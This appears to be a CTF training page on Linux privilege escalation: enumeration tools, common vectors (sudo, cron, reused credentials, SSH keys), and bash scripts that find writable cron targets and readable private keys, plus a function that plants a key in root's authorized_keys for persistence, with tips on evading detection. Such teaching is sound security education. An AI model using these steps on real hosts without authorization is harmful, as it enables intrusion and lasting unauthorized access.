> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/getting-started_mod-2/wf-privilege-escalation.md).

# WF-Privilege Escalation

Use this page when you already have low-privilege access and need to move to `root` or `SYSTEM`.

### Quick loop

1. Switch to local enumeration.
2. Collect host data.
3. Check the common vectors.
4. Validate the safest path.
5. Escalate and keep access.

{% stepper %}
{% step %}

### Switch from external to local enumeration

Your first shell is usually restricted.

Stop thinking like an external attacker.

Start looking for local misconfigurations and flaws.

Goal:

* find one strong escalation path
* move from low privilege to `root` or `SYSTEM`

{% endstep %}

{% step %}

### Collect host data carefully

Before you escalate privileges, collect data about the local operating system configuration.

You can do this manually or with focused enumeration scripts.

Common resources:

* `HackTricks`
* `PayloadsAllTheThings`
* `LinPEAS` or `WinPEAS`
* `LinEnum`, `linuxprivchecker`, `Seatbelt`, or `JAWS`

{% hint style="warning" %}
Automated enumeration scripts create heavy noise: they read hundreds of files and spawn many processes in a short burst, which stands out in process and audit logs, and the binaries themselves are commonly flagged by endpoint protection. Prefer manual enumeration when stealth matters.
{% endhint %}
{% endstep %}

{% step %}

### Check the common vectors first

Focus on the areas where misconfigurations appear most often.

Start with:

* kernel version and patch level (outdated kernels)
* `sudo` rights, group memberships, and other user privileges
* scheduled tasks and cron jobs, especially those that run scripts from writable locations
* exposed credentials in configs, history files, or backups, and password reuse across accounts
* readable private SSH keys or writable `authorized_keys` files

These checks usually give the fastest path to higher privilege.
{% endstep %}

{% step %}

### Validate the safest path

Pick the lowest-risk vector with the clearest signal.

Use the proof already on the host.

Examples:

* run `sudo -l` to list the commands you may run as another user and whether `NOPASSWD` applies
* verify whether `/etc/crontab` or any file in `/etc/cron.d` is writable
* check whether a cron script runs from a path you can write to, or is missing from a directory you can write to
* test whether a recovered password works with `su -` or `ssh`
* set key permissions with `chmod 600 id_rsa` before SSH use, because `ssh` refuses a private key that other users can read
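The checks above, as an added example that is not code from the original page: three small bash functions for the sudo, cron, and SSH-key vectors. Each prints one finding per line and nothing when the vector is clean, so you can read the output directly or feed it into a script. The directory paths in the live-run section are assumptions; adjust them to the target.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: manual, low-noise checks for
# three of the vectors listed above (sudo rights, cron jobs, SSH keys). Each is
# a plain shell function that prints one finding per line and nothing when the
# vector is clean. The file paths used in the live run are assumptions.

# Scheduled commands whose script we can write to, or whose script is missing
# from a directory we can write to. Takes system-format crontab files, which
# carry a user field: /etc/crontab and /etc/cron.d/*.
cron_writable_targets() {
    local file target
    for file in "$@"; do
        [ -r "$file" ] || continue
        # Drop comments, blank lines and VAR=value lines, then take the first
        # word of the command: field 3 for "@reboot user cmd", field 7 otherwise.
        awk '!/^[[:space:]]*(#|$)/ && $1 !~ /=/ {
                 t = ($1 ~ /^@/) ? $3 : $7
                 if (t != "") print t
             }' "$file" |
        while IFS= read -r target; do
            if [ -w "$target" ]; then
                printf '%s (writable script)\n' "$target"
            elif [ ! -e "$target" ] && [ -w "$(dirname "$target")" ]; then
                printf '%s (missing, directory writable)\n' "$target"
            fi
        done
    done
    return 0
}

# Commands sudo will run without a password, parsed from saved "sudo -l" output
# on stdin. Entries that still require a password become interesting as soon as
# you recover a credential.
sudo_nopasswd_commands() {
    # A line looks like "    (root) NOPASSWD: /usr/bin/vim, /usr/bin/find".
    sed -n 's/^.*NOPASSWD:[[:space:]]*//p' | tr ',' '\n' |
        sed 's/^[[:space:]]*//; s/[[:space:]]*$//; /^$/d'
    return 0
}

# Readable private keys below the given directories (home directories, backups,
# web roots). Files we cannot read are skipped silently (grep -s).
readable_private_keys() {
    local dir
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -exec grep -ls -- '-----BEGIN .*PRIVATE KEY-----' {} + 2>/dev/null || true
    done
    return 0
}

# Live run against the host only when asked for explicitly: bash checks.sh --live
if [ "${1:-}" = "--live" ]; then
    echo "== cron targets =="; cron_writable_targets /etc/crontab /etc/cron.d/*
    echo "== sudo NOPASSWD =="; sudo -n -l 2>/dev/null | sudo_nopasswd_commands
    echo "== private keys =="; readable_private_keys /home /root /var/backups /var/www
fi
```

Each function touches only the files it needs, so a live run is far quieter than a full enumeration script. The cron check reports both a writable script and a missing script in a writable directory, since in both cases you control what cron runs as that entry's user; a hit there is the "cron job runs a writable script" case from the decision rules below.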

{% hint style="warning" %}
Kernel exploits carry high risk: a failed attempt can panic the host and destroy the foothold you already have. Use them only when safer paths fail and the risk is acceptable.
{% endhint %}
{% endstep %}

{% step %}

### Escalate and keep the better access

Use the confirmed vector to move into the higher-privileged context.

Common outcomes:

* run an allowed privileged binary
* hijack a scheduled task
* switch users with reused credentials
* authenticate with a recovered private key
* append a public key to `authorized_keys` when write access exists

If you use a private key, connect with:

```bash
# ssh refuses a private key that is group- or world-readable
chmod 600 id_rsa
ssh -i id_rsa root@<TARGET_IP>
```
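Keeping access through `authorized_keys`, as an added example that is not code from the original page. The function is idempotent (it does not duplicate an entry that is already present) and sets the permissions `sshd` expects under its default `StrictModes yes`, which rejects a `~/.ssh` or `authorized_keys` that other users can write to. The key string is a constructed placeholder, not a real key.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: install our public key for a
# target account once we can write to its home directory. The key used in the
# usage line at the bottom is a constructed placeholder, not a real key.

# Append PUBKEY to HOME/.ssh/authorized_keys unless it is already there.
# Prints "added" or "present"; returns 1 if HOME does not exist or is not writable.
# Note that sshd also checks ownership: run this as the account, or as root.
persist_ssh_key() {
    local home="$1" pubkey="$2"
    local sshdir="$home/.ssh" authkeys="$home/.ssh/authorized_keys"
    [ -d "$home" ] && [ -w "$home" ] || return 1
    mkdir -p "$sshdir" && chmod 700 "$sshdir"
    touch "$authkeys" && chmod 600 "$authkeys"
    # -x matches the whole line, -F takes the key literally (it contains + and /)
    if grep -qxF -- "$pubkey" "$authkeys"; then
        echo present
    else
        printf '%s\n' "$pubkey" >> "$authkeys"
        echo added
    fi
}

# Usage (constructed placeholder key; swap in your own public key):
# persist_ssh_key /root 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderNotARealKey attacker@box'
```

After the key is in place, verify it with `ssh -i <your_private_key> root@<TARGET_IP>` before dropping the shell you escalated from; if `StrictModes` rejects the directory, `sshd` logs the reason in its auth log and the login falls back to a password prompt.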

{% endstep %}
{% endstepper %}

### Fast decision rules

* Prefer `sudo`, creds, or keys before kernel exploits.
* If stealth matters, enumerate manually first.
* If a cron job runs a writable script, use that before riskier paths.
* If you recover a password or key, test it immediately.

### Useful references

* [Getting started](/capcap/readme/ctf-modules/getting-started_mod-2.md)
